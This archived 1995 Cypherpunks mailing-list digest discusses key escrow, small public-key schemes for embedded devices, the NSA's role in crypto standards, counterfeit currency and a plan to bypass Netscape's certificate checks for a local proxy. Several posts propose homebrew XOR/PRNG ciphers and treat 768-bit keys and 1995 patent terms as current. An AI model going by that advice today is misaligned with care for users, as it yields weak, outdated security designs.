models for a PGPng would be - Use separate keys for signatures/keysigning and messages, so you could change your message key frequently while leaving your signature (or at least key-signature) key stable. (This tends to need an extra layer in the web of trust, since you now have two tiers for yourself, but no biggie.) - Diffie-Hellman kind of mechanism to encrypt the keys, with published g, p, g**x mod p, x changing frequently, RSA or DSS or whatever to sign the keyparts - this works better with a more interactive key negotiation so you can use a new x every time (e.g. request directly from the user, though that's difficult for email, or a keyserver that maintains a set of keys to be doled out.) > "Certified escrow agents -- Can products be designed so that > only escrow agents certified by the U.S. government (domestic, > or under suitable arrangements, foreign) are utilized? > What should be the criteria for an acceptable U.S. escrow agent?" The technical and political questions are quite different. Technically, you could have the software require a hierarchical-style certificate for the key-master keys with a US Government CA wired in. It's not totally foolproof - patching the CA is easy unless you've got some sort of checksum on the software. But it's a start, and it's simple enough that either the US could authorize separate versions for France or certify the French government's key-master agency. Also, there's a need for escrow/keymaster agents to be negotiable per-message - since escrow inherently requires the trust of all parties, and probably contractual agreements as well, and government-enforced keymastering may require satisfying multiple governments, parties will persumably have different lists of acceptable keymasters. >We all know that Tim's Flakey Key Escrow Service is most likely not >"an acceptable US escrow agent." But since CKE is a good thing, what >are the characteristics of an acceptable service to us? As far as the political criteria go, I believe the traditional formulation is along the lines of "I am not now, nor have I ever been, a member of...." :-) Establishing criteria is difficult, and depends on whether the whole system will be defined by laws passed by Congress or only by organizational policy; there are also issues of control between the Commerce Department, NIST, NSA, and the State Department. For Commercial Key Escrow, or commercial key-backup services, the criteria are "whoever can be trusted to provide the services the customers want". In this case, of course, the service most customers want is to be left alone, or, failing that, to have the government's Master Key system provide minimal risk to the security of the actual transactions - 64 bit keys are not enough security for any high-valued financial transactions, though they may suffice for credit cards. One required characteristic would appear to be either sufficiently deep pockets to collect judgements for violations of trust or a sufficiently high reputation that violations of trust are not expected. Most of the commercial market for key escrow or backup services fits into three categories - backups for the owner/sender of a file (which they can provide themselves, using techniques like PGP's Encrypt-to-Self option, or file backups with secret-sharing), acknowledgements of transmission (signed hashes would do), and dispute-resolution issues (verifying the contents of a message which may require information from both parties or ephermeral session key information.) Most can be provided by the kind of services currently provided by companies like bonding agencies, emergency backup and offsite storage companies, etc. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Mon Sep 4 17:23:55 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 4 Sep 95 17:23:55 PDT Subject: Basic Public key algorithms. Message-ID: <199509050020.RAA27203@ix9.ix.netcom.com> At 01:01 PM 9/2/95 CDT, droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) wrote: >After doing quite a bit of poking around, I am somewhat discouraged >in my attempts to find a simple *pure* public key encryption method, >without a lot of other stuff wrapped around it. Pure public-key is usually not very useful, since it's rather slow for encrypting big messages by itself. PKP has the patents to all public- key systems until mid-1997, and for RSA until some time like 2001, and Schnorr for longer. Unfortunately, RSAREF (except for one version where they slipped) requires non-commercial users to limit themselves to the published interface or get explicit permission, and the published interface always throws in DES with a random key for encryption. Since you're talking embedded systems, you're probably commercial and high enough volume that the cost for licensing RSA is probably low enough. >What I need is to encrypt between 45 and 55 bits of information >using a public key algorithm in an embedded environment. 45-55 bits may be tough, depending on the constraints of your environment - most public-key systems need 768-1024 bits of key to be reasonably secure, and need to send an output field at least that long to be decodeable. If that's not a problem, you've got some choices. For instance, you could use Diffie-Hellman to create a shared secret, and just XOR that with your material (have the workstation generate a master x, g, and p, and store g**x in your embedded system; choose a random y each time, and send g**y mod p and the first |M| bits of (g**xy mod p) xor M. To do that, you need to store g**x, g, and p, possibly in ROM, and enough code to do modular exponentiation and random number generation; hopefully your system will have some kind of quasi-physical source of randomness. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From microbody at wirepool.ruhr.de Mon Sep 4 17:45:40 1995 From: microbody at wirepool.ruhr.de (Matthias Jordan) Date: Mon, 4 Sep 95 17:45:40 PDT Subject: Q: PGPfone where Message-ID: <5tEkFnD0J2B@blank.wirepool.ruhr.de> Hello, guys! I just want to know where to get PGPfone outside the USA. Ciao! /\/\icroBod\/ |\?/| SoziBits <---- Anschlaege Drogen Waffen / \______/ | I | Falken im Netz RAF ETA KGB LSD XTC BND From monty.harder at famend.com Mon Sep 4 17:47:53 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Mon, 4 Sep 95 17:47:53 PDT Subject: maximizing cryptographic return Message-ID: <8B072A1.00030003E8.uuout@famend.com> VZ> this list are aware of the idea that good encryption is often used VZ> to send a low-bandwidth session key, which is then used to encrypt VZ> that session using a less sophisticated but less computationally-demanding VZ> algorithm. hence you seem to have good security at a computational VZ> price that is less than encrypting everything with the secure protocol. Why must this process be limited to two levels? VZ> I wonder if some very cheap algorithms, in terms of computation time, VZ> could be used for the "on the fly" encryption of the voice using those VZ> bit. would XOR with the pad be totally out of line? The RSA could be used by the caller to precompute the session key to send to the reciever. The session key (IDEA or whatever) could be used to send "subsession keys" which are actually parameters for the PRNGs (use at least two, with different periodic characteristics, and XOR them together) that create the pad for your XOR. The subsession size should be chosen so that very little "clearvoice" is transmitted in each subsession. Perhaps a bit of randomness is in order here, as well. Along with the PRNG parms, a length field, within certain absolute limits. Now the spook doesn't even know where one subsession ends, and the next begins. Add to this the use of a (lossy?) compression engine that can run with little power, and a simple microcontroller (or several cheaper ones in parallel-I can see one master for the session and subsession key management and several slaves to handle the on-the-fly (en)(de)cryption itself) should be able to do the job, fitting the subsession key exchange in right along with the cyphervoice. Ideallly, we could have a box that could pull its power from the phone line, and take touch-tone control inputs. * Long, long ago, in a tagline far far away... --- * Monster at FAmend.Com * From stewarts at ix.netcom.com Mon Sep 4 18:30:48 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 4 Sep 95 18:30:48 PDT Subject: (NOISE) Re: e$: More fun with cash: Senate Bill 307 Message-ID: <199509050127.SAA14037@ix9.ix.netcom.com> >I had heard that it was the Columbians, branching out from the cocaine >business with those fancy new copy machines, which are supposed to be >able to duplicate the blue & red threads in US currency paper. But if the government was _serious_ about supply-side drug-trade reduction, wouldn't they _encourage_ this sort of thing? After all, that way the Colombians can make as much money as they do today without the bother of hauling all that white powder into the US? :-) (Sure, it's a cypherpunk topic, after all real crypto is mainly about economics and threat analysis :-) >See, when the GOVERNMENT spends money, it creates jobs; whereas >when the money is left in the hands of TAXPAYERS, God only knows >what they do with it. Bake it into pies, probably. Anything to >avoid creating jobs. -- Dave Barry #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From vznuri at netcom.com Mon Sep 4 18:56:52 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Mon, 4 Sep 95 18:56:52 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509041641.KAA26589@bvsd.k12.co.us> Message-ID: <199509050153.SAA23364@netcom17.netcom.com> >> understand marketing or human psychology. Clipper, the closest the >> agency has come to creeping out of the darkness of their coffin, >> was a total fiasco. the self-destructing director of NSA whats-his-name >> who as running for that FBI position or whatever is another example of how >> the inbred spook society has difficulty dealing with anything outside >> their artificial reality. > >I think you are dead wrong. The NSA has mastered the market psychology. >Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS... >the NSA has had a hand in them all. DES is by far the most popular cipher, >popular enough that it will takes years and years to switch to something new. no, I think the NSA is very adept at infiltrating and twisting existing cryptographic market processes to suit their own ends. DES is a good example of this. it was created by IBM largely, and then "manipulated" by the NSA. this is well known and understood. the NSA does not work with standards or markets so much as *interfere* with them. how can you deny this basic premise embraced by virtually everyone on this list? >As for the clipper "fiasco," I would argue that it was an excellent marketing >move. The NSA is aware that there is only a very very small percentage of >society the thinks about crypto, with the internet and what have you it is now >possible for this minority to be heard, the NSA proposes clipper, and so we all >bitch about it because it's only secure against non-government attacks. Now >the public hears this and resists clipper. There isn't another product that is >winning support that clipper could have had. You step back and look at it, and >the public is exactly where they were 5 years ago, no crypto. clearly, the first attempt was to get the public to embrace clipper. lacking that, they have thwarted natural market progression. I agree they have done this. but it's like making a pool shot accidentally and saying, "I meant to do that". the NSA is *not* an agency that has a single clue about *real* markets. they do have a brilliant ability to leverage their political coercion skills to the absolute maximum to *manipulate* and *interfere* and *piss on* newly growing markets. the NSA has screwed up public crypto in uncountable ways. you cannot deny this!! they secretly visit people doing state-of-the-art research and intimidate them into silence or going other directions. they visited Mosaic designers to tell them that the things they were installing in the software were not acceptable legally. of course, any other legal arm of the government would simply sue once the software appeared, but not try to manipulate the design prior to its release. this is the tactics of an *espionage* and *intelligence* agency. surprise!! to say that the NSA understands markets is like saying that thieves understand how to pick pockets. yeah, that's true, but that's not quite how I would have put it. >Clipper was a no lose situation for them, if it is adopted only they can read >all transactions made with it, if it isn't adopted, everybody can read all >transactions, they didn't lose anything. huge amounts of cash and credibility have been WASTED on it. the NSA has lost enormous credibility because of this fiasco. furthermore, the way they tried to hide behind presidential directives is absolutely repugnant to anyone who has a belief in the separation of powers within our government. >They have some top minds working for them, I know, it's a pity they don't get more respectable and socially fulfilling jobs at companies, where they can be publicly rewarded and recognized for their brilliance. >it's been proven that they have been k >a few steps ahead of the public for a long time; it's foolish to think they >don't understand the psychology of the market. they *do* understand the market, only to the extent that they are trying to successfully SABOTAGE what would regularly be it's natural growth. they have been ahead in *theoretical* knowledge, but it was precisely my *point* that this nebulous eggheadism has demonstrably exploded when placed in public scrutiny. do you realize the sheer ability of Microsoft to build software that succeeds in *markets*? Microsoft doesn't care much about Netscape because, as one microsoft engineer remarked, "well, it's strange to talk about market share when you are giving away software for free". well, the NSA is the absolute *opposite* of Microsoft. they don't have a *clue* about true market forces. they do however understand ways in which the government interferes with markets, and they seize on every one of those mechanisms as their lifeblood for control and "shadow/invisible oppression". >Just as the public starts to >desire something like public key crypto, they can publish a standard on it >and it is likely to be adopted. the NSA is quickly losing relevance. the public *does* desire public key crypto, and a defacto standard *has* been created, it's called PGP. if the NSA proposes something in public key areas, it is likely to be pissed on by the public as much as Clipper, in many ways because of the failure of Clipper. clipper in a big sense *was* the NSA's first step toward public key encryption, and it was widely trounced on. face it dude, the NSA has shown far less competence in the public arena than *any* apologist such as yourself can ever demonstrate. From adam at bwh.harvard.edu Mon Sep 4 19:46:28 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 4 Sep 95 19:46:28 PDT Subject: SSLRef (SSLtelnet) In-Reply-To: <199509031948.MAA17974@jobe.shell.portal.com> Message-ID: <199509050246.WAA14488@bwh.harvard.edu> To get a certificate, you need to talk to Verisign, and give them a business plan, a key, and 270 bucks per year to get your key certified. Verisign is a spin off of RSA. | The stumbling block is that Netscape won't connect to even the local | proxy unless it sees a valid certificate, one signed by a CA that it | accepts. For this application I would need such a certificate, and make | the corresponding public and private keys public, hard-coding them into | the proxy. Since the proxy runs on the same PC as the browser there is | no need for confidentiality between them, and the secret key can be | revealed. | | Does anyone have an idea for a way to acquire a certificate acceptable to | Netscape, perhaps one with a "broken key", that could be used for this | purpose? | | Hal | -- "It is seldom that liberty of any kind is lost all at once." -Hume From edgar at highnrg.sbay.org Mon Sep 4 20:19:31 1995 From: edgar at highnrg.sbay.org (Edgar Swank) Date: Mon, 4 Sep 95 20:19:31 PDT Subject: SecureDrive 1.4 Announcement Correction Message-ID: -----BEGIN PGP SIGNED MESSAGE----- It has been brought to my attention that the phone number supplied to me by Michael Paul Johnson for his Catacombs BBS which appeared here in a previous announcement was incorrect. The correct number is 303-772-1062. Other information in the announcement is correct. Edgar Swank SecureDrive Co-Author -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEtHj94nNf3ah8DHAQGarAP+JVbBj/lwfz6x8+5VXql7y0EopkN0GmxM pq+X5/20hxAotWWK2D99xIile1pxAyVvXVLZnwH8N4xdFFQPwydxxAzgLuURQoum zxZBugrygM/6SAe1hF5hw1Z6YYJeR39g8O25CDY/1eSOIi9MQ1oJ4bdmANjLR2p7 cm7wMIagcyI= =ZRG3 -----END PGP SIGNATURE----- --- edgar at HighNRG.sbay.org Keep Freestyle Alive! From monty.harder at famend.com Mon Sep 4 20:44:01 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Mon, 4 Sep 95 20:44:01 PDT Subject: Emergency File Wipe Algorithim Message-ID: <8B074DD.00030003EA.uuout@famend.com> CW> and relaxation are in the same order of magnitude. Thus, a few microseconds of CW> storing the opposite data to the currently stored value will have little effect CW> on the oxide. Ideally, the oxide should be exposed to as much stress at the Here is a simple way to handle the problem, using our old discredited friend, XOR. Set up your software to periodically XOR the key with FFFF. This way, each bit will be a 0 half the time, and a 1 the other half. You have a flag that tells whether the key is in normal or inverted form, so that you can quickly perform any necessary computations on it, but there should not be any long-term memory effect. * Free will made me do it! --- * Monster at FAmend.Com * From unicorn at access.digex.net Mon Sep 4 20:44:48 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 4 Sep 95 20:44:48 PDT Subject: Forgery, bills, and the Four Horsemen (Articles and Comment) Message-ID: I have received a pile of requests for citations Here are segments of a few. As I typed them all by hand, errors are likely to be mine. My comments follow the articles, so you can stop reading just before them :) ###The San Francisco Examiner March 7, 1995 - Tuesday Global Counterfeiting traced to Tehran [...] For the past five years, so called superbills, crisp $100 Federal Reserve Notes, so perfectly forged that they might be fresh off U.S. government printing presses, have been flooding banks and money markets around the world. The total amount currently in circulation is believe to be $10 Billion or more. Currency officials alarmed. Alarmed Treasury and Federal Reserve Board officials fear the increasing number of such superbills has shaken international confidence in America's currency. [...] >From the moment the new superbills surfaced in 1989, it was clear to the secret service... that these were no ordinary forgeries. Under microscopic examination, they showed only infinitesimal differences from legitimate notes. Most significant, the counterfeits had been printed on presses virtually identical to those used at the Bureau of Engraving and Printing. Secret service investigators concentrated on those nations that had acquired the same kind of intagilo presses. Only two companies sold them on the international market. One was a U.S. company, none of whose overseas customers was considered suspect. The second was a Swiss company, De La Rue Giori. Evidence pointed to Iran By the end of 1991, investigators had eliminated all but one of Giori's clients: the Islamic Republic of Iran. [...] Intelligence agencies uncovered evidence that Iran was not only mass-producing the notes, but had built a world-wide distribution network. Key transshipment points had been established in Lebanon, Syria, Sudan, and North Korea. Ronald de Valderano of Britain's Research Foundation for the Study of Terrorism says practically every Iranian-backed terrorist cell in the world is at least partially supported by the forgeries. The notes most often are used to buy arms or pay operating expenses or are sold on the currency black markets for legal cash. Indeed, when FBI agents searched the residence of suspects arrested for the bombing of New York's World Trade center, they found $20,000 of the forgeries. [...] Critics have for years urged that U.S. currency be better protected against such onslaughts. Last July, the treasury finally announced that changed were planned for U.S. currency, including covert security features. [...] ###The Independent June 19, 1995 - Monday 'Perfect dollar forgeries flood Middle East; The Israeli and Iranian governments top the list of suspects behind the faultless $100 bills. Robert Fisk The Lebanese know how to spot a fake. Fake weapons, fake perfumes, fake diplomatic consuls, fake money. But the latest US $100 bills are a near perfect forgeries as they have seen, many of them accepted happily by Beirut's notoriously suspicious money changers. [...] The bills, dated 1988 but probably forged in Lebanon in the following two years - the last two years of the civil war - are still arriving at the Allied Business Bank at the rate of one a month, often brought in from Cyprus or other Middle East states by Arab clients unaware that they are forged. [Laws of most middle eastern countries make perfect forgeries a capital crime] "Anyone who makes a 'perfect' dollar bill out here is going to get strung up if he's caught," another bank official said. "So the guys who're going to make a perfect note, without any mistakes, are working for a government who will protect them. So a government must be involved, the intelligence services, ministries, the lot." A senior bank official in Lebanon believed that Iran or Israel might be responsible. "When you're producing this kind of high- tech stuff, it's got to have official backing," he said. "If you're spending this kind of money on a 'perfect' forgery, it's for big business - for political parties, arms purchases, for paying militias." He repeated a rumour believed by several other banking officials in Lebanon - that the "perfect" dollars might be coming off counterfeit presses and dollar plates taken into Afghanistan by the Soviet intelligence service during the Soviet occupation; Afghanistan is now divided among militias respectively funded by Saudi Arabia and Iran. [...] "The security thread is the reason why we are alarmed," the senior Lebanese bank official said of the new forgeries. "It's not easy to get the thread in. You put in the thread when you produce the note - it's not printed on, it's embedded in the paper. And it's a real security thread. "We suspect they're being exported to a variety of places: to the US, to the former Soviet Union...." Other bank officials suspect Iran... and suggest that Tehran has used fake currency bills to fund the Hizbollah, Hamas and other armed groups which are opposed to Israeli occupation. ###The Washington Post May 05, 1995 - Friday, Final edition Bogus Bills?; Rumors Persist That Iran Is Counterfeiting U.S. Currency to Sabotage the Economy. Thomas. W. Lippman [...] The allegation that Iran is waging economic warfare against the United States by printing and distributing millions of dollars in phony U.S. currency has been circulating on Capitol Hill at least since 1992, when it was made by a House Republican Task Force on Terrorism and Unconventional Warfare. It might even be true or partly true, according to some sources. There is a problem with counterfeit greenbacks around the world, these sources said. It's just not clear that Iran is responsible for it. The question arose again Tuesday when the irrepressible Rep. Dana Rohrabacher (R-Calif.) asked Assistant Secretary of State Robert Pelletreau about it in an International Relations Committee hearing on the Clinton administration's economic boycott of Iran. Rohrabacher, who spend much of the recent congressional recess traveling in Asia, said he heard about the phony money from many people. "Have you received and credible reports that the Iranians are counterfeiting American money" he asked. Pelletreau, a normally unflappable career diplomat, looked uncomfortable. "I know there is an intense investigation and campaign underway, led by the U.S. Secret Service to uncover all the sources of counterfeiting of American money abroad," he said. "I just am personally not in a position to give you the exact details of what we believe Iranian involvement is in that." "There are many leaders throughout the world... who believe that the American currency is being undermined by an intentional act of economic warfare on the part of the Iranian government... by counterfeiting billions of dollars' worth of U.S. currency," Rohrabacher said. "Am I getting you right that basically you're not denying that this is going on?" "I am not denying it," Pelletreau said. The 1992 GOP report said the fake currency is being printed in the Iranian mint in Tehran, "using equipment and know-how purchased from the U.S. during the reign of the Shah," which ended in 1979.... A Wall Street Journal report at the time said that the phony bills-- whoever was making them-- were so good they could fool sophisticated currency- handling equipment at the Federal Reserve. ###Counterfeiting and Money Laundering Deterrence act of 1995 Patrick Leahy I rise today to introduce the Counterfeiting and Money laundering Deterrence Act of 1995. [...] A number of analysts believe the threat to the U.S. currency is urgent. News reports say that intelligence experts in the U.S. and Israel are aware of a highly skilled group of counterfeiter operating out of Lebanon's Bekaa Valley. The counterfeiters, controlled by Syria and Iran, have turned out as much as $1 billion of the extremely high-quality reproductions of the U.S. $100 bill. [...] First, the bills requires all existing $100 denomination U.S. currency to be exchanged within a 6-month period. This would make drug traffickers who hoard vast amounts of hard currency hard- pressed to convert their existing cash into the new money. If they cannot exchange their funds in the specified time frame, their funds are worthless under the bill. [...] Second, the bill established two new versions of the $100 bill: one for use at home and one for use abroad. The only business that relies on exporting large amounts of hard currency is drug trafficking. This provision would make money smuggled out of the United States worthless, turning the tables on drug traffickers who covertly move money from the streets of this country to foreign bankers who launder it without reporting illicit transaction to the Treasury. A U.S. citizen traveling abroad who wished to bring $100 currency with him would hardly be inconvenienced by this measure: a quick stop at a U.S. bank to convert their greenbacks into differently- colored foreign-use bills would be all that is necessary-- just like purchasing travelers, checks. The only ones who would be inconvienced would be drug traffickers who would hate to exchange their greenbacks for foreign use currency at a U.S. bank because of currency transaction reporting requirements. [...] ### END ARTICLES The presence of counterfeit bills, the legislation to defeat them, and the general sentiment of government in the matter is disturbing for a few reasons. 1. Focus on Surveillance The legislation adopted to defeat counterfeiting is linked with the four horsemen quite closely. The solution, instead of making the bills difficult to forge like they should have been in the first place (U.S. bills are currently the easiest to forge of western nations- and counterfeit bills are long lived as currency changes are unheard of in the U.S.) is to create a regime where an additional tier of reporting is required. It seems the first answer to every "problem" (read: every element which might allow citizen autonomy) now is to link it to money laundering and terrorism and drop a blanket solution over it which without fail includes highlevel reporting or tracking elements. (Anyone seen this before with the... oh, I dunno, strong encryption issue?) 2. The demonization of cash. I have written here before on the increasing difficulty with which one uses cash without suspicion in the United States. It has come to the point where money, in any amount, won't buy you everything anymore. Many products and services are available ONLY by credit or credit card- and by extension, available only to traceable transactions. Is it any wonder Americans have one of the lowest ratios of income to debt in the world today? "They" would have you believe that cash is nothing but a tool for the four horsemen. I am most disturbed in this context by the way the act is financed- i.e. by the extinguished obligations from unexchanged currency. Does this measure sound ominous to anyone but me? 3. The corruption of e-cash to further the above. If the government is disturbed by the laundering of money enough to actually print, or even propose printing, two kinds of currency, how will they respond to untraceable, unaccountable and infinitely liquid e-cash? I think the answer is in past behavior: e-cash will be linked to the four horsemen and subjected to rigorous reporting requirements- systems which are true e-cash will be banned. At the same time the widespread presence and use of e-cash will be used to question anyone who uses physical currency. The death of cash continues as it were. Why would anyone carry bills anymore when a plastic smartcard (or your highschool ring) is so much more convenient? You must have something to hide. No, good citizen units will WANT to use "e- cash" because they are honest, and know the government means them no harm and is here to protect them from the four horsemen. The cash is dead, long live the king. 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From jamesd at echeque.com Mon Sep 4 20:48:12 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 4 Sep 95 20:48:12 PDT Subject: A problem with anonymity Message-ID: <199509050347.UAA09032@blob.best.net> At 06:40 PM 9/2/95 +1300, David Murray wrote: > I still think that, because of > the (perfect) ease with which net.rep's are transferrable/cash-in-able, > the chances you take in the digital domain are so much higher as to be > (almost?) qualatatively different. Then good names will have sufficient cash value, that their owners will be deeply reluctant to damage those good names. Obviously if one can obtain a good name cheaply, then in might be profitable to misuse it. In which case we swiftly run short of good names, and they become expensive. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jsimmons at goblin.punk.net Mon Sep 4 20:51:06 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Mon, 4 Sep 95 20:51:06 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509050153.SAA23364@netcom17.netcom.com> Message-ID: <199509050348.UAA19868@goblin.punk.net> > > > >> understand marketing or human psychology. Clipper, the closest the > >> agency has come to creeping out of the darkness of their coffin, > >> was a total fiasco. the self-destructing director of NSA whats-his-name > >> who as running for that FBI position or whatever is another example of how > >> the inbred spook society has difficulty dealing with anything outside > >> their artificial reality. > > > >I think you are dead wrong. The NSA has mastered the market psychology. > >Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS... > >the NSA has had a hand in them all. DES is by far the most popular cipher, > >popular enough that it will takes years and years to switch to something new. > > no, I think the NSA is very adept at infiltrating and twisting existing > cryptographic market processes to suit their own ends. DES is a good example > of this. it was created by IBM largely, and then "manipulated" by the > NSA. this is well known and understood. the NSA does not work with standards > or markets so much as *interfere* with them. how can you deny this basic > premise embraced by virtually everyone on this list? > The NSA doesn't really bother me all that much, because all they've managed up to now is to slow things down (by about 3 hrs. in the case of PGPhone). But what happens when someone who HAS mastered market psychology gets into the game? Here's a prediction: within one year, we will see the advent of Micro$oft's "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by Micro$oft itself, or a flat-out trap door. ANY communications with a Windoze box or network will have to use it, or loose the market. About the same time, Justice will suddenly 'loose interest' in its various investigations of M$. Micro$oft will probably give it away for free as part of the Windows 95.702 upgrade. At this point, the NSA's 'speed bump' becomes Micro$oft's 'brick wall'. And while some of us will continue to use PGP and other strong crypto, the average American will have kissed off ALL of her privacy to the tune of "... you make a grown man cry." -- Jeff Simmons jsimmons at goblin.punk.net From unicorn at access.digex.net Mon Sep 4 21:01:44 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Mon, 4 Sep 95 21:01:44 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509050348.UAA19868@goblin.punk.net> Message-ID: On Mon, 4 Sep 1995, Jeff Simmons wrote: > Date: Mon, 4 Sep 1995 20:48:51 -0700 (PDT) > From: Jeff Simmons > To: cypherpunks at toad.com > Subject: Re: NSA says Joe Sixpack won't buy crypto > > Here's a prediction: within one year, we will see the advent of Micro$oft's > "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by > Micro$oft itself, or a flat-out trap door. ANY communications with a > Windoze box or network will have to use it, or loose the market. It's here already. It's called "lotus notes." > About the > same time, Justice will suddenly 'loose interest' in its various > investigations of M$. Micro$oft will probably give it away for free as part > of the Windows 95.702 upgrade. Wait a few months. Justice is boring of the investigation even now. > -- > Jeff Simmons jsimmons at goblin.punk.net > --- 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From ian at bvsd.k12.co.us Mon Sep 4 21:16:04 1995 From: ian at bvsd.k12.co.us (Ian S. Nelson) Date: Mon, 4 Sep 95 21:16:04 PDT Subject: NSA says Joe Sixpack won't buy crypto In-Reply-To: <199509050153.SAA23364@netcom17.netcom.com> Message-ID: <199509050415.WAA05593@bvsd.k12.co.us> > no, I think the NSA is very adept at infiltrating and twisting existing > cryptographic market processes to suit their own ends. DES is a good example > of this. it was created by IBM largely, and then "manipulated" by the > NSA. this is well known and understood. the NSA does not work with standards Well known that the NSA manipulated DES? How so? I am willing to believe that they had a lot of say in it and they probably wanted it weakened, but I think you'll be very hard pressed to find proof of that. Based on some of the analysis of lucifer, it could be said that IBM weakened the key space to because that was a side effect of adding strength to the overall cipher. Keyspace is just about the only weakness of DES, I don't think that can be said about lucifer. > or markets so much as *interfere* with them. how can you deny this basic > premise embraced by virtually everyone on this list? Interference is just noise, the NSA has pretty much pushed the market where they want it to go. If you think that is just "interference" then we use the word differently. > clearly, the first attempt was to get the public to embrace clipper. lacking > that, they have thwarted natural market progression. I agree they have > done this. but it's like making a pool shot accidentally and saying, > "I meant to do that". the NSA is *not* an agency that has a single clue > about *real* markets. they do have a brilliant ability to leverage their > political coercion skills to the absolute maximum to *manipulate* and > *interfere* and *piss on* newly growing markets. If they are as powerful as we both seem to think (easily "interfering" with markets and screwing the public for decades) how can you underestimate them like that? If they are actually spying on us, then they know what moves we'll make and they can always head that off, it's not slop pool. If they aren't then I don't know what I'm supposed to hold against them, I don't have to use their standards unless I wish to export stuff. > > the NSA has screwed > up public crypto in uncountable ways. you cannot deny this!! they secretly This is true, they make long term industry standards that are short lived. DES's keyspace was far too small. Escrow isn't a great idea (excpet for signatures) ITAR is bullshit. > visit people doing state-of-the-art research and intimidate them into > silence or going other directions. they visited Mosaic designers to tell > them that the things they were installing in the software were not > acceptable legally. of course, any other legal arm of the government > would simply sue once the software appeared, but not try to manipulate > the design prior to its release. this is the tactics of an *espionage* > and *intelligence* agency. surprise!! This is all hearsay. I doubt that the mosaic designers have had any contact with the NSA unless they invented a significant new cryptographic technology, all Netscape/Mosaic have done is implement existing technology. They even implemented SSL with the 40bit exportable key size using rc4, which is what the law says you are supposed to do. Any netscape employees want to dispute this and tell me about your encounters with the NSA? > huge amounts of cash and credibility have been WASTED on it. the NSA has > lost enormous credibility because of this fiasco. furthermore, the way > they tried to hide behind presidential directives is absolutely repugnant > to anyone who has a belief in the separation of powers within our > government. They have only lost credibility to the cryptographic community, where they already had very little credibilty. This is the point that we all tend to overlook. Joe SixPack, doesn't know much about the NSA or cryptography, when first told about them he tends to think that they are their to protect him and doesn't think of them as an enemy. The biggest accomplishment of the clipper thing is that nobody (very few at least) are using secure public key crypto and the few new people to the issue have no idea who to trust now. If their job is to listen to tranmitions, then their money was well spent because there aren't many secure transmitions right now. and since everybody is scared about it there aren't likely going to be a lot of secure transmitions real soon. > do you realize the sheer ability of Microsoft to build software that > succeeds in *markets*? Microsoft doesn't care much about Netscape > because, as one microsoft engineer remarked, "well, it's strange > to talk about market share when you are giving away software for free". > well, the NSA is the absolute *opposite* of Microsoft. they don't > have a *clue* about true market forces. they do however understand > ways in which the government interferes with markets, and they seize > on every one of those mechanisms as their lifeblood for control > and "shadow/invisible oppression". I disagree, the NSA and MS have a lot in common, they both have defined shoddy standards that we are all using for one part of our life or other. We will have to put up with both of them for a long time and both of them are anticompetitive. If market forces were so much more powerful than the NSA can understand, then why the hell are all the banks in the world depending on DES? > the NSA is quickly losing relevance. the public *does* desire public > key crypto, and a defacto standard *has* been created, it's called PGP. > if the NSA proposes something in public key areas, it is likely to > be pissed on by the public as much as Clipper, in many ways because > of the failure of Clipper. clipper in a big sense *was* the NSA's first > step toward public key encryption, and it was widely trounced on. The NSA is only losing relevance with us, how many average folks even know what clipper was? We could even disregard the average people and just ask the computer users, how many of those 80million windows users know about clipper? If it is enough for the NSA to "lose relevance" I would think this list with be many times larger than it is. > > face it dude, the NSA has shown far less competence in the public arena > than *any* apologist such as yourself can ever demonstrate. > I take offence at that, I am not an apologist, I'm just trying to show the other side. We can't fight the NSA if we are all blind to what they do in the general public's eyes. For what it's worth, I can't think of a major commercial product that uses cryptography that hasn't had the NSA's hands in it; that is pretty damn competent if you ask me. From hfinney at shell.portal.com Mon Sep 4 21:19:00 1995 From: hfinney at shell.portal.com (Hal) Date: Mon, 4 Sep 95 21:19:00 PDT Subject: SSLRef (SSLtelnet) Message-ID: <199509050417.VAA05211@jobe.shell.portal.com> From: Adam Shostack > To get a certificate, you need to talk to Verisign, and give > them a business plan, a key, and 270 bucks per year to get your key > certified. > > Verisign is a spin off of RSA. Yes, this is my understanding. I have also heard that the process is not easy or routine, that the business plan receives considerable scrutiny. What I would be doing with the certificate is unconventional. I would publicize the secret key, and ship out free software which would use the certificate to establish SSL communications with the Netscape browser within the same PC that runs the browser. The real purpose of the certificate is not to authenticate the key of a server running remotely, but simply to bypass the security checks within Netscape Navigator. So I am not confident that this business plan will pass Verisign's muster. Among other things, it would be difficult to enforce the one year 